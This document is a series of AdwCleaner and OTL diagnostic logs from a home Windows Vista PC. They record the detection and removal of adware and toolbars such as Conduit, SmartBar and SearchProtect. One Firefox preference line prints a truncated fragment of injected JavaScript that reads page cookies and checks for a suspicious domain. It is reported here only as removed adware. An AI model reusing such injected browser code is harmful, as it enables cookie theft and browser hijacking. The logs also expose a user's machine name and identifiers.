Folder Found : C:\ProgramData\Vaudix
Folder Found : C:\Users\Ken\AppData\Local\Google\Chrome\User Data\Default\Extensions\knfhfghnfdabbalddnnbdjmjomfgjbog
Folder Found : C:\Users\Ken\AppData\Local\SwvUpdater
Folder Found : C:\Users\Ken\AppData\LocalLow\Conduit

***** [ Shortcuts ] *****


***** [ Registry ] *****

Key Found : HKCU\Software\AppDataLow\Software\SmartBar
Key Found : HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{AFBCB7E0-F91A-4951-9F31-58FEE57A25C4}
Key Found : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{30CEEEA2-3742-40e4-85DD-812BF1CBB83D}
Key Found : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{30CEEEA2-3742-40e4-85DD-812BF1CBB83D}
Key Found : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{F0DA78E9-6B60-42fb-BC26-EF2CFB8C8FF3}
Key Found : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{F0DA78E9-6B60-42fb-BC26-EF2CFB8C8FF3}
Key Found : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{30CEEEA2-3742-40e4-85DD-812BF1CBB83D}
Key Found : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{30CEEEA2-3742-40e4-85DD-812BF1CBB83D}
Key Found : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{F0DA78E9-6B60-42fb-BC26-EF2CFB8C8FF3}
Key Found : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{F0DA78E9-6B60-42fb-BC26-EF2CFB8C8FF3}
Key Found : HKCU\Software\YahooPartnerToolbar
Key Found : HKLM\SOFTWARE\Classes\CLSID\{02478D38-C3F9-4EFB-9B51-7695ECA05670}
Key Found : HKLM\SOFTWARE\Classes\CLSID\{30CEEEA2-3742-40e4-85DD-812BF1CBB83D}
Key Found : HKLM\SOFTWARE\Classes\CLSID\{30CEEEA2-3742-40e4-85DD-812BF1CBB83D}
Key Found : HKLM\SOFTWARE\Classes\CLSID\{35B8892D-C3FB-4D88-990D-31DB2EBD72BD}
Key Found : HKLM\SOFTWARE\Classes\CLSID\{EF99BD32-C1FB-11D2-892F-0090271D4F88}
Key Found : HKLM\SOFTWARE\Classes\CLSID\{F0DA78E9-6B60-42fb-BC26-EF2CFB8C8FF3}
Key Found : HKLM\SOFTWARE\Classes\CLSID\{F0DA78E9-6B60-42fb-BC26-EF2CFB8C8FF3}
Key Found : HKLM\SOFTWARE\Classes\driverscanner
Key Found : HKLM\SOFTWARE\Classes\Interface\{3F607E46-0D3C-4442-B1DE-DE7FA4768F5C}
Key Found : HKLM\SOFTWARE\Classes\Interface\{79FB5FC8-44B9-4AF5-BADD-CCE547F953E5}
Key Found : HKLM\SOFTWARE\Classes\Interface\{FE0273D1-99DF-4AC0-87D5-1371C6271785}
Key Found : HKLM\SOFTWARE\Classes\protector_dll.protectorbho
Key Found : HKLM\SOFTWARE\Classes\protector_dll.protectorbho.1
Key Found : HKLM\SOFTWARE\Classes\TypeLib\{93E3D79C-0786-48FF-9329-93BC9F6DC2B3}
Key Found : HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{3097F293-D232-474E-ABEA-469F80D3A924}
Key Found : HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{8B8671A7-FA01-4452-AB99-C4728E98247D}
Key Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{F0DA78E9-6B60-42fb-BC26-EF2CFB8C8FF3}
Key Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{F0DA78E9-6B60-42fb-BC26-EF2CFB8C8FF3}
Key Found : HKLM\Software\Uniblue
Value Found : HKCU\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser [{30CEEEA2-3742-40e4-85DD-812BF1CBB83D}]
Value Found : HKCU\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser [{30CEEEA2-3742-40e4-85DD-812BF1CBB83D}]
Value Found : HKCU\Software\Microsoft\Internet Explorer\URLSearchHooks [{EF99BD32-C1FB-11D2-892F-0090271D4F88}]
Value Found : HKCU\Software\Microsoft\Windows\CurrentVersion\Run [OpenDNS Updater]
Value Found : HKCU\Software\Microsoft\Windows\CurrentVersion\Run [OpenDNS Updater]
Value Found : HKLM\SOFTWARE\Microsoft\Internet Explorer\Toolbar [{30CEEEA2-3742-40e4-85DD-812BF1CBB83D}]
Value Found : HKLM\SOFTWARE\Microsoft\Internet Explorer\Toolbar [{30CEEEA2-3742-40e4-85DD-812BF1CBB83D}]

***** [ Browsers ] *****

-\\ Internet Explorer v9.0.8112.16545


-\\ Mozilla Firefox v4.0 (en-US)

[ File : C:\Users\Ken\AppData\Roaming\Mozilla\Firefox\Profiles\8agrx3pn.default\prefs.js ]

Line Found : user_pref("CT3279141_Firefox.csv", "[{\"from\":\"Abs Layer\",\"action\":\"loading toolbar\",\"time\":1359865252627,\"isWithState\":\"\",\"timeFromStart\":0,\"timeFromPrev\":0}]");
Line Found : user_pref("Smartbar.SearchFromAddressBarSavedUrl", "");
Line Found : user_pref("ct3279141.UserID", "UN28102926548955477");
Line Found : user_pref("extensions.510db82b7af87.scode", "(function(){try{var url=(window.self.location.href + document.cookie);if(url.indexOf(\"acebook\")>-1||url.indexOf(\"warnalert11.com\")>-1||url.indexOf(\"su[...]
Line Found : user_pref("smartbar.machineId", "Q1E1MICY+X/UYZGHUW8FG1RMXX7RAR9QXY7BWSTQPZAC+YJBB+8MDV05S8R2S730VTWVZ2HOLPQDDL9GVKHUNG");

-\\ Google Chrome v34.0.1847.137

[ File : C:\Users\Ken\AppData\Local\Google\Chrome\User Data\Default\preferences ]

Found [Search Provider] : hxxp://search.aol.com/aol/search?query={searchTerms}
Found [Search Provider] : hxxp://www.ask.com/web?q={searchTerms}
Found [Extension] : knfhfghnfdabbalddnnbdjmjomfgjbog

*************************

AdwCleaner[R0].txt - [4730 octets] - [20/05/2014 13:54:39]
AdwCleaner[R1].txt - [5804 octets] - [20/05/2014 13:55:20]

########## EOF - C:\AdwCleaner\AdwCleaner[R1].txt - [5864 octets] ##########
 

# AdwCleaner v3.210 - Report created 20/05/2014 at 13:56:32
# Updated 19/05/2014 by Xplode
# Operating System : Windows Vista ™ Home Premium Service Pack 2 (32 bits)
# Username : Ken - KEN-HOME
# Running from : C:\Users\Ken\Desktop\AdwCleaner.exe
# Option : Clean

***** [ Services ] *****


***** [ Files / Folders ] *****

Folder Deleted : C:\ProgramData\Vaudix
Folder Deleted : C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Vaudix
Folder Deleted : C:\Program Files\Conduit
Folder Deleted : C:\Program Files\SearchProtect
Folder Deleted : C:\Users\Ken\AppData\Local\SwvUpdater
Folder Deleted : C:\Users\Ken\AppData\LocalLow\Conduit
Folder Deleted : C:\Users\Ken\AppData\Local\Google\Chrome\User Data\Default\Extensions\knfhfghnfdabbalddnnbdjmjomfgjbog
[!] Folder Deleted : C:\Users\Ken\AppData\Local\Google\Chrome\User Data\Default\Extensions\knfhfghnfdabbalddnnbdjmjomfgjbog

***** [ Shortcuts ] *****


***** [ Registry ] *****

[#] Key Deleted : HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{3097F293-D232-474E-ABEA-469F80D3A924}
[#] Key Deleted : HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{8B8671A7-FA01-4452-AB99-C4728E98247D}
Key Deleted : HKLM\SOFTWARE\Classes\driverscanner
Key Deleted : HKLM\SOFTWARE\Classes\protector_dll.protectorbho
Key Deleted : HKLM\SOFTWARE\Classes\protector_dll.protectorbho.1
Value Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Run [OpenDNS Updater]
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{02478D38-C3F9-4EFB-9B51-7695ECA05670}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{35B8892D-C3FB-4D88-990D-31DB2EBD72BD}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{EF99BD32-C1FB-11D2-892F-0090271D4F88}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{30CEEEA2-3742-40e4-85DD-812BF1CBB83D}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{F0DA78E9-6B60-42fb-BC26-EF2CFB8C8FF3}
Key Deleted : HKLM\SOFTWARE\Classes\Interface\{3F607E46-0D3C-4442-B1DE-DE7FA4768F5C}
Key Deleted : HKLM\SOFTWARE\Classes\Interface\{79FB5FC8-44B9-4AF5-BADD-CCE547F953E5}
Key Deleted : HKLM\SOFTWARE\Classes\Interface\{FE0273D1-99DF-4AC0-87D5-1371C6271785}
Key Deleted : HKLM\SOFTWARE\Classes\TypeLib\{93E3D79C-0786-48FF-9329-93BC9F6DC2B3}
Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{F0DA78E9-6B60-42fb-BC26-EF2CFB8C8FF3}
Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{30CEEEA2-3742-40e4-85DD-812BF1CBB83D}
Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{F0DA78E9-6B60-42fb-BC26-EF2CFB8C8FF3}
Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{30CEEEA2-3742-40e4-85DD-812BF1CBB83D}
Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{F0DA78E9-6B60-42fb-BC26-EF2CFB8C8FF3}
Key Deleted : HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{AFBCB7E0-F91A-4951-9F31-58FEE57A25C4}
Value Deleted : HKLM\SOFTWARE\Microsoft\Internet Explorer\Toolbar [{30CEEEA2-3742-40e4-85DD-812BF1CBB83D}]
Value Deleted : HKCU\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser [{30CEEEA2-3742-40e4-85DD-812BF1CBB83D}]
Value Deleted : HKCU\Software\Microsoft\Internet Explorer\URLSearchHooks [{EF99BD32-C1FB-11D2-892F-0090271D4F88}]
Key Deleted : HKCU\Software\YahooPartnerToolbar
Key Deleted : HKCU\Software\AppDataLow\Software\SmartBar
Key Deleted : HKLM\Software\Uniblue
Value Deleted : HKLM\SOFTWARE\Microsoft\Internet Explorer\Toolbar [{30CEEEA2-3742-40e4-85DD-812BF1CBB83D}]

***** [ Browsers ] *****

-\\ Internet Explorer v9.0.8112.16545


-\\ Mozilla Firefox v4.0 (en-US)

[ File : C:\Users\Ken\AppData\Roaming\Mozilla\Firefox\Profiles\8agrx3pn.default\prefs.js ]

Line Deleted : user_pref("CT3279141_Firefox.csv", "[{\"from\":\"Abs Layer\",\"action\":\"loading toolbar\",\"time\":1359865252627,\"isWithState\":\"\",\"timeFromStart\":0,\"timeFromPrev\":0}]");
Line Deleted : user_pref("Smartbar.SearchFromAddressBarSavedUrl", "");
Line Deleted : user_pref("ct3279141.UserID", "UN28102926548955477");
Line Deleted : user_pref("extensions.510db82b7af87.scode", "(function(){try{var url=(window.self.location.href + document.cookie);if(url.indexOf(\"acebook\")>-1||url.indexOf(\"warnalert11.com\")>-1||url.indexOf(\"su[...]
Line Deleted : user_pref("smartbar.machineId", "Q1E1MICY+X/UYZGHUW8FG1RMXX7RAR9QXY7BWSTQPZAC+YJBB+8MDV05S8R2S730VTWVZ2HOLPQDDL9GVKHUNG");

-\\ Google Chrome v34.0.1847.137

[ File : C:\Users\Ken\AppData\Local\Google\Chrome\User Data\Default\preferences ]

Deleted [Search Provider] : hxxp://search.aol.com/aol/search?query={searchTerms}
Deleted [Search Provider] : hxxp://www.ask.com/web?q={searchTerms}
Deleted [Extension] : knfhfghnfdabbalddnnbdjmjomfgjbog

*************************

AdwCleaner[R0].txt - [4730 octets] - [20/05/2014 13:54:39]
AdwCleaner[R1].txt - [5944 octets] - [20/05/2014 13:55:20]
AdwCleaner[S0].txt - [4922 octets] - [20/05/2014 13:56:32]

########## EOF - C:\AdwCleaner\AdwCleaner[S0].txt - [4982 octets] ##########
 

# AdwCleaner v3.210 - Report created 20/05/2014 at 13:56:32
# Updated 19/05/2014 by Xplode
# Operating System : Windows Vista ™ Home Premium Service Pack 2 (32 bits)
# Username : Ken - KEN-HOME
# Running from : C:\Users\Ken\Desktop\AdwCleaner.exe
# Option : Clean

***** [ Services ] *****


***** [ Files / Folders ] *****

Folder Deleted : C:\ProgramData\Vaudix
Folder Deleted : C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Vaudix
Folder Deleted : C:\Program Files\Conduit
Folder Deleted : C:\Program Files\SearchProtect
Folder Deleted : C:\Users\Ken\AppData\Local\SwvUpdater
Folder Deleted : C:\Users\Ken\AppData\LocalLow\Conduit
Folder Deleted : C:\Users\Ken\AppData\Local\Google\Chrome\User Data\Default\Extensions\knfhfghnfdabbalddnnbdjmjomfgjbog
[!] Folder Deleted : C:\Users\Ken\AppData\Local\Google\Chrome\User Data\Default\Extensions\knfhfghnfdabbalddnnbdjmjomfgjbog

***** [ Shortcuts ] *****


***** [ Registry ] *****

[#] Key Deleted : HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{3097F293-D232-474E-ABEA-469F80D3A924}
[#] Key Deleted : HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{8B8671A7-FA01-4452-AB99-C4728E98247D}
Key Deleted : HKLM\SOFTWARE\Classes\driverscanner
Key Deleted : HKLM\SOFTWARE\Classes\protector_dll.protectorbho
Key Deleted : HKLM\SOFTWARE\Classes\protector_dll.protectorbho.1
Value Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Run [OpenDNS Updater]
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{02478D38-C3F9-4EFB-9B51-7695ECA05670}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{35B8892D-C3FB-4D88-990D-31DB2EBD72BD}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{EF99BD32-C1FB-11D2-892F-0090271D4F88}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{30CEEEA2-3742-40e4-85DD-812BF1CBB83D}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{F0DA78E9-6B60-42fb-BC26-EF2CFB8C8FF3}
Key Deleted : HKLM\SOFTWARE\Classes\Interface\{3F607E46-0D3C-4442-B1DE-DE7FA4768F5C}
Key Deleted : HKLM\SOFTWARE\Classes\Interface\{79FB5FC8-44B9-4AF5-BADD-CCE547F953E5}
Key Deleted : HKLM\SOFTWARE\Classes\Interface\{FE0273D1-99DF-4AC0-87D5-1371C6271785}
Key Deleted : HKLM\SOFTWARE\Classes\TypeLib\{93E3D79C-0786-48FF-9329-93BC9F6DC2B3}
Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{F0DA78E9-6B60-42fb-BC26-EF2CFB8C8FF3}
Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{30CEEEA2-3742-40e4-85DD-812BF1CBB83D}
Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{F0DA78E9-6B60-42fb-BC26-EF2CFB8C8FF3}
Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{30CEEEA2-3742-40e4-85DD-812BF1CBB83D}
Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{F0DA78E9-6B60-42fb-BC26-EF2CFB8C8FF3}
Key Deleted : HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{AFBCB7E0-F91A-4951-9F31-58FEE57A25C4}
Value Deleted : HKLM\SOFTWARE\Microsoft\Internet Explorer\Toolbar [{30CEEEA2-3742-40e4-85DD-812BF1CBB83D}]
Value Deleted : HKCU\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser [{30CEEEA2-3742-40e4-85DD-812BF1CBB83D}]
Value Deleted : HKCU\Software\Microsoft\Internet Explorer\URLSearchHooks [{EF99BD32-C1FB-11D2-892F-0090271D4F88}]
Key Deleted : HKCU\Software\YahooPartnerToolbar
Key Deleted : HKCU\Software\AppDataLow\Software\SmartBar
Key Deleted : HKLM\Software\Uniblue
Value Deleted : HKLM\SOFTWARE\Microsoft\Internet Explorer\Toolbar [{30CEEEA2-3742-40e4-85DD-812BF1CBB83D}]

***** [ Browsers ] *****

-\\ Internet Explorer v9.0.8112.16545


-\\ Mozilla Firefox v4.0 (en-US)

[ File : C:\Users\Ken\AppData\Roaming\Mozilla\Firefox\Profiles\8agrx3pn.default\prefs.js ]

Line Deleted : user_pref("CT3279141_Firefox.csv", "[{\"from\":\"Abs Layer\",\"action\":\"loading toolbar\",\"time\":1359865252627,\"isWithState\":\"\",\"timeFromStart\":0,\"timeFromPrev\":0}]");
Line Deleted : user_pref("Smartbar.SearchFromAddressBarSavedUrl", "");
Line Deleted : user_pref("ct3279141.UserID", "UN28102926548955477");
Line Deleted : user_pref("extensions.510db82b7af87.scode", "(function(){try{var url=(window.self.location.href + document.cookie);if(url.indexOf(\"acebook\")>-1||url.indexOf(\"warnalert11.com\")>-1||url.indexOf(\"su[...]
Line Deleted : user_pref("smartbar.machineId", "Q1E1MICY+X/UYZGHUW8FG1RMXX7RAR9QXY7BWSTQPZAC+YJBB+8MDV05S8R2S730VTWVZ2HOLPQDDL9GVKHUNG");

-\\ Google Chrome v34.0.1847.137

[ File : C:\Users\Ken\AppData\Local\Google\Chrome\User Data\Default\preferences ]

Deleted [Search Provider] : hxxp://search.aol.com/aol/search?query={searchTerms}
Deleted [Search Provider] : hxxp://www.ask.com/web?q={searchTerms}
Deleted [Extension] : knfhfghnfdabbalddnnbdjmjomfgjbog

*************************

AdwCleaner[R0].txt - [4730 octets] - [20/05/2014 13:54:39]
AdwCleaner[R1].txt - [5944 octets] - [20/05/2014 13:55:20]
AdwCleaner[S0].txt - [4922 octets] - [20/05/2014 13:56:32]

########## EOF - C:\AdwCleaner\AdwCleaner[S0].txt - [4982 octets] ##########
 

OTL logfile created on: 5/20/2014 2:17:11 PM - Run 4
OTL by OldTimer - Version 3.2.69.0     Folder = C:\Users\Ken\Desktop
Windows Vista Home Premium Edition Service Pack 2 (Version = 6.0.6002) - Type = NTWorkstation
Internet Explorer (Version = 9.0.8112.16421)
Locale: 00000409 | Country: United States | Language: ENU | Date Format: M/d/yyyy
 
3.00 Gb Total Physical Memory | 1.73 Gb Available Physical Memory | 57.84% Memory free
6.20 Gb Paging File | 4.72 Gb Available in Paging File | 76.12% Paging File free
Paging file location(s): ?:\pagefile.sys [binary data]
 
%SystemDrive% = C: | %SystemRoot% = C:\Windows | %ProgramFiles% = C:\Program Files
Drive C: | 111.69 Gb Total Space | 51.32 Gb Free Space | 45.95% Space Free | Partition Type: NTFS
Drive D: | 111.43 Gb Total Space | 35.69 Gb Free Space | 32.03% Space Free | Partition Type: NTFS
Drive F: | 74.53 Gb Total Space | 29.77 Gb Free Space | 39.95% Space Free | Partition Type: NTFS
 
Computer Name: KEN-HOME | User Name: Ken | Logged in as Administrator.
Boot Mode: Normal | Scan Mode: Current user
Company Name Whitelist: Off | Skip Microsoft Files: Off | No Company Name Whitelist: On | File Age = 30 Days
 
========== Processes (SafeList) ==========
 
PRC - [2014/05/20 08:28:38 | 000,602,112 | ---- | M] (OldTimer Tools) -- C:\Users\Ken\Desktop\OTL.exe
PRC - [2014/05/19 12:49:22 | 005,625,624 | ---- | M] (SUPERAntiSpyware) -- C:\Program Files\SUPERAntiSpyware\SUPERANTISPYWARE.EXE
PRC - [2014/05/07 21:52:34 | 032,668,056 | ---- | M] (Dropbox, Inc.) -- C:\Users\Ken\AppData\Roaming\Dropbox\bin\Dropbox.exe
PRC - [2014/03/11 10:13:24 | 000,022,216 | ---- | M] (Microsoft Corporation) -- c:\Program Files\Microsoft Security Client\MsMpEng.exe
PRC - [2014/03/11 10:13:14 | 000,951,576 | ---- | M] (Microsoft Corporation) -- C:\Program Files\Microsoft Security Client\msseces.exe
PRC - [2013/04/25 19:32:22 | 000,602,112 | ---- | M] () -- C:\Program Files\TRENDnet\TEW-805UB\WlanCU.exe
PRC - [2013/04/23 03:48:17 | 010,244,448 | ---- | M] (TeamViewer GmbH) -- C:\Program Files\TeamViewer\Version8\TeamViewer.exe
PRC - [2013/04/23 03:48:17 | 003,574,624 | ---- | M] (TeamViewer GmbH) -- C:\Program Files\TeamViewer\Version8\TeamViewer_Service.exe
PRC - [2013/04/23 03:40:59 | 000,193,888 | ---- | M] (TeamViewer GmbH) -- C:\Program Files\TeamViewer\Version8\tv_w32.exe
PRC - [2013/02/12 22:37:16 | 001,263,952 | ---- | M] () -- C:\Program Files\DivX\DivX Update\DivXUpdate.exe
PRC - [2013/01/30 11:41:30 | 000,430,080 | ---- | M] (Realtek) -- C:\Windows\SwUSB.exe
PRC - [2013/01/18 10:21:02 | 000,873,248 | ---- | M] (NVIDIA Corporation) -- C:\Program Files\NVIDIA Corporation\Display\nvxdsync.exe
PRC - [2013/01/18 10:21:00 | 001,821,984 | ---- | M] (NVIDIA Corporation) -- C:\Program Files\NVIDIA Corporation\Display\nvtray.exe
PRC - [2013/01/18 08:14:20 | 000,383,264 | ---- | M] (NVIDIA Corporation) -- C:\Program Files\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe
PRC - [2012/12/14 15:54:26 | 000,036,864 | ---- | M] () -- C:\Windows\runSW.exe
PRC - [2012/10/23 18:58:52 | 000,120,728 | ---- | M] () -- C:\Program Files\Motorola Mobility\Motorola Device Manager\MotoHelperService.exe
PRC - [2012/10/23 18:58:40 | 000,694,168 | ---- | M] () -- C:\Program Files\Motorola Mobility\Motorola Device Manager\MotoHelperAgent.exe
PRC - [2012/09/08 10:18:45 | 000,116,608 | ---- | M] (SUPERAntiSpyware.com) -- C:\Program Files\SUPERAntiSpyware\SASCORE.EXE
PRC - [2011/09/02 17:06:38 | 000,065,657 | ---- | M] (Motorola) -- C:\Program Files\Motorola\MotForwardDaemon\ForwardDaemon.exe
PRC - [2011/03/18 13:53:06 | 000,924,632 | ---- | M] (Mozilla Corporation) -- C:\Program Files\Mozilla Firefox\firefox.exe
PRC - [2010/11/23 22:21:18 | 000,130,000 | R--- | M] (Symantec Corporation) -- C:\Program Files\Norton Safe Web Lite\Engine\1.2.0.6\ccSvcHst.exe
PRC - [2010/03/18 19:17:48 | 000,019,456 | ---- | M] (Creative Technology Ltd) -- C:\Windows\System32\CtHelper.exe
PRC - [2010/02/12 10:23:12 | 000,286,720 | ---- | M] (Creative Technology Ltd) -- C:\Program Files\Creative\Shared Files\CTAudSvc.exe
PRC - [2009/04/11 02:27:36 | 002,926,592 | ---- | M] (Microsoft Corporation) -- C:\Windows\explorer.exe
PRC - [2009/03/05 16:07:20 | 002,260,480 | ---- | M] (Safer-Networking Ltd.) -- C:\Program Files\Spybot - Search & Destroy\TeaTimer.exe
PRC - [2009/02/19 16:10:54 | 000,238,968 | ---- | M] (Symantec Corporation) -- C:\Program Files\Symantec\LiveUpdate\AluSchedulerSvc.exe
PRC - [2009/01/26 15:31:10 | 001,153,368 | ---- | M] (Safer Networking Ltd.) -- C:\Program Files\Spybot - Search & Destroy\SDWinSec.exe
PRC - [2008/11/12 17:01:14 | 003,425,632 | ---- | M] (Symantec Corporation) -- C:\Program Files\Norton Ghost\Agent\VProSvc.exe
PRC - [2008/06/26 19:09:36 | 000,167,936 | ---- | M] () -- C:\Program Files\TRENDnet\TEW-805UB\WlanWpsSvc.exe
PRC - [2008/01/29 17:38:31 | 000,583,048 | ---- | M] (Symantec Corporation) -- C:\Program Files\Common Files\Symantec Shared\PIF\{B8E1DD85-8582-4c61-B58F-2F227FCA9A08}\PIFSvc.exe
PRC - [2007/02/27 19:08:38 | 000,689,672 | ---- | M] (American Power Conversion Corporation) -- C:\Program Files\APC\APC PowerChute Personal Edition\mainserv.exe
PRC - [2007/02/13 07:26:50 | 000,053,248 | ---- | M] (Acer Inc.) -- C:\Acer\Empowering Technology\eRecovery\eRecoveryService.exe
 
 
========== Modules (No Company Name) ==========
 
MOD - [2014/05/20 14:00:24 | 000,041,984 | ---- | M] () -- c:\Users\Ken\AppData\Local\Temp\dropbox_sqlite_ext.{5f3e3153-5bce-5766-8f84-3e3e7ecf0d81}.tmprtbsin.dll
MOD - [2014/01/02 23:42:50 | 003,610,624 | ---- | M] () -- C:\Users\Ken\AppData\Roaming\Dropbox\bin\wxmsw28uh_vc.dll
MOD - [2013/10/18 19:55:02 | 025,100,288 | ---- | M] () -- C:\Users\Ken\AppData\Roaming\Dropbox\bin\libcef.dll
MOD - [2013/09/05 00:14:10 | 004,300,456 | ---- | M] () -- C:\Program Files\Common Files\microsoft shared\OFFICE14\Cultures\OFFICE.ODF
MOD - [2013/04/25 19:32:22 | 000,602,112 | ---- | M] () -- C:\Program Files\TRENDnet\TEW-805UB\WlanCU.exe
MOD - [2013/02/12 22:38:06 | 000,100,688 | ---- | M] () -- C:\Program Files\DivX\DivX Update\DivXUpdateCheck.dll
MOD - [2013/02/12 22:37:16 | 001,263,952 | ---- | M] () -- C:\Program Files\DivX\DivX Update\DivXUpdate.exe
MOD - [2012/10/23 18:58:40 | 000,694,168 | ---- | M] () -- C:\Program Files\Motorola Mobility\Motorola Device Manager\MotoHelperAgent.exe
MOD - [2011/12/13 11:10:00 | 000,413,696 | ---- | M] () -- C:\Program Files\TRENDnet\TEW-805UB\WlanDll.dll
MOD - [2011/05/18 11:53:44 | 001,496,576 | ---- | M] () -- C:\Users\Ken\AppData\Roaming\Mozilla\Firefox\Profiles\8agrx3pn.default\extensions\{3112ca9c-de6d-4884-a869-9855de68056c}\components\frozen.dll
MOD - [2011/05/18 11:53:44 | 000,343,552 | ---- | M] () -- C:\Users\Ken\AppData\Roaming\Mozilla\Firefox\Profiles\8agrx3pn.default\extensions\{3112ca9c-de6d-4884-a869-9855de68056c}\libraries\googletoolbar-ff4.dll
MOD - [2011/03/18 13:53:11 | 001,874,904 | ---- | M] () -- C:\Program Files\Mozilla Firefox\mozjs.dll
MOD - [2010/10/20 16:45:26 | 008,801,120 | ---- | M] () -- C:\Program Files\Microsoft Office\Office14\1033\GrooveIntlResource.dll
MOD - [2009/05/14 10:27:32 | 000,294,912 | ---- | M] () -- C:\Program Files\TRENDnet\TEW-805UB\WPSCtrl.dll
 
 
========== Services (SafeList) ==========
 
SRV - File not found [Auto | Running] -- C:\Program Files\Spybot -- (SBSDWSCService)
SRV - File not found [Auto | Stopped] -- C:\Program Files\Common Files\Symantec Shared\ccSvcHst.exe /h ccCommon -- (LiveUpdate Notice Ex)
SRV - File not found [Auto | Stopped] -- C:\Program Files\Common Files\Symantec Shared\ccSvcHst.exe /h ccCommon -- (CLTNetCnService)
SRV - [2014/03/11 10:13:24 | 000,279,776 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- c:\Program Files\Microsoft Security Client\NisSrv.exe -- (NisSrv)
SRV - [2014/03/11 10:13:24 | 000,022,216 | ---- | M] (Microsoft Corporation) [Auto | Running] -- c:\Program Files\Microsoft Security Client\MsMpEng.exe -- (MsMpSvc)
SRV - [2013/12/19 00:41:02 | 030,814,400 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Program Files\Microsoft Office\Office14\GROOVE.EXE -- (Microsoft SharePoint Workspace Audit Service)
SRV - [2013/04/23 03:48:17 | 003,574,624 | ---- | M] (TeamViewer GmbH) [Auto | Running] -- C:\Program Files\TeamViewer\Version8\TeamViewer_Service.exe -- (TeamViewer8)
SRV - [2013/01/18 08:14:20 | 000,383,264 | ---- | M] (NVIDIA Corporation) [Auto | Running] -- C:\Program Files\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe -- (Stereo Service)
SRV - [2012/12/14 15:54:26 | 000,036,864 | ---- | M] () [Auto | Running] -- C:\Windows\runSW.exe -- (RunSwUSB)
SRV - [2012/12/03 11:39:40 | 001,259,880 | ---- | M] (NVIDIA Corporation) [Auto | Stopped] -- C:\Program Files\NVIDIA Corporation\NVIDIA Update Core\daemonu.exe -- (nvUpdatusService)
SRV - [2012/10/23 18:58:52 | 000,120,728 | ---- | M] () [Auto | Running] -- C:\Program Files\Motorola Mobility\Motorola Device Manager\MotoHelperService.exe -- (Motorola Device Manager)
SRV - [2012/09/08 10:18:45 | 000,116,608 | ---- | M] (SUPERAntiSpyware.com) [Auto | Running] -- C:\Program Files\SUPERAntiSpyware\SASCORE.EXE -- (!SASCORE)
SRV - [2011/09/02 17:06:38 | 000,065,657 | ---- | M] (Motorola) [Auto | Running] -- C:\Program Files\Motorola\MotForwardDaemon\ForwardDaemon.exe -- (PST Service)
SRV - [2011/04/12 17:24:09 | 000,079,360 | ---- | M] (Creative Labs) [On_Demand | Stopped] -- C:\Program Files\Common Files\Creative Labs Shared\Service\AL6Licensing.exe -- (Creative ALchemy AL6 Licensing Service)
SRV - [2011/04/12 17:11:04 | 000,079,360 | ---- | M] (Creative Labs) [On_Demand | Stopped] -- C:\Program Files\Common Files\Creative Labs Shared\Service\CTAELicensing.exe -- (Creative Audio Engine Licensing Service)
SRV - [2010/11/23 22:21:18 | 000,130,000 | R--- | M] (Symantec Corporation) [Auto | Running] -- C:\Program Files\Norton Safe Web Lite\Engine\1.2.0.6\ccSvcHst.exe -- (NSL)
